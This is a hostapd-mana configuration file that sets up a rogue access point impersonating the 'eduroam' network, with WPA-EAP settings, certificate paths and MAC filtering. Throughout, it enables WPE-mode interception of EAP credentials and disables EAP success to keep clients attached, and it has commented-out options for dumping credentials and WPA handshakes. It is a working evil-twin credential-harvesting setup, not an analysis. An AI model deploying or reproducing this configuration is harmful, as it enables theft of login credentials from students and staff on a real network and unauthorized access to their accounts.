##############################################################
# General Wi-Fi settings                                     #
##############################################################

interface=wlan0
ssid=eduroam
# if CONFIG_ACS build option is enabled, the channel can be selected
# automatically at run time by setting channel=acs_survey or channel=0, both of
# which will enable the ACS survey based algorithm.
channel=11
hw_mode=g

##############################################################
# Specific enterprise authentication settings                #
##############################################################

wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3

##############################################################
# Enterprise authentication definitions and file dirs        #
##############################################################

ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
eapol_key_index_workaround=0
#ca_cert=/etc/hostapd-mana/certs/ca.pem
#server_cert=/etc/hostapd-mana/certs/server.pem
#private_key=/etc/hostapd-mana/certs/server.key
ca_cert=certs/ca-certificates.crt
server_cert=certs/server.pem
private_key=certs/server.key
private_key_passwd=
dh_file=certs/dhparam.pem

mana_wpe=1 : enable WPE mode for EAP credentials interception on the screen (we do not need to send to a file with mana_credout because the custom script does this)
mana_eapsuccess=0 : disable EAP Success mode (from WPE), must be disabled, otherwise some provider-specific equipments might not deauthenticate by themselves

##############################################################
# Device denying behaviour                                   #
##############################################################

# make so that denied devices can't see the network
mana_macacl=1

# accept/deny mac address
# 0 = accept unless in deny list
# 1 = deny unless in accept list
macaddr_acl=0
accept_mac_file=hostapd.accept
deny_mac_file=hostapd.deny





# enable credentials dumping
#mana_credout=hostapd.credout
# enable wpa handshake dumping
#mana_wpaout=hostapd.hccapx

# enable external connections (for CLI/GUI, etc)
#ctrl_interface=/var/run/hostapd
#ctrl_interface_group=0